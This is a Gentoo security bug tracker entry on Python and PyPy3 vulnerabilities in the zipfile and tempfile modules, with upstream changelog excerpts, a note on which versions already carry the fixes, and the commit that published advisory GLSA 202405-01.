Summary: | <dev-lang/python-{3.8.19,3.9.19,3.10.14,3.11.8,3.12.2}, <dev-python/pypy3_{9,10}-7.3.16: “quoted-overlap” zip-bombs in zipfile module, dereferencing symlinks in cleanup of TemporaryDirectory | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Michał Górny <mgorny> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | normal | ||
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | A1 [glsa+] | ||
Package list: | Runtime testing required: | --- | |
Bug Depends on: | 927308, 927309, 927315, 929048, 929049, 929050, 930591 | ||
Bug Blocks: |
Description
Michał Górny
2024-03-19 18:19:42 UTC
https://discuss.python.org/t/python-3-10-14-3-9-19-and-3-8-19-is-now-available/48993 lists more: > gh-81194: a crash in socket.if_indextoname() with a specific value (UINT_MAX) was fixed. Relatedly, an integer overflow in socket.if_indextoname() on 64-bit non-Windows platforms was fixed > gh-113659: .pth files with names starting with a dot or containing the hidden file attribute are now skipped > gh-102388: iso2022_jp_3 and iso2022_jp_2004 codecs no longer read out of bounds > gh-114572 1: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads Sigh, looks like upstream announcement was wrong: zipfile fix is already present in 3.11.8 and 3.12.2. tempfile fix is already present in 3.11.8 and 3.12.1. Everything else, except for the SSLContext thing, also seems to be present in older versions. However, that one doesn't seem like a real security issue at a first glance. cleanup done. The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/data/glsa.git/commit/?id=665ec86173a28118d28182d8381d593988f1adac commit 665ec86173a28118d28182d8381d593988f1adac Author: GLSAMaker <glsamaker@gentoo.org> AuthorDate: 2024-05-04 05:59:08 +0000 Commit: Hans de Graaff <graaff@gentoo.org> CommitDate: 2024-05-04 06:00:31 +0000 [ GLSA 202405-01 ] Python, PyPy3: Multiple Vulnerabilities Bug: https://bugs.gentoo.org/884653 Bug: https://bugs.gentoo.org/897958 Bug: https://bugs.gentoo.org/908018 Bug: https://bugs.gentoo.org/912976 Bug: https://bugs.gentoo.org/919475 Bug: https://bugs.gentoo.org/927299 Signed-off-by: GLSAMaker <glsamaker@gentoo.org> Signed-off-by: Hans de Graaff <graaff@gentoo.org> glsa-202405-01.xml | 79 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) |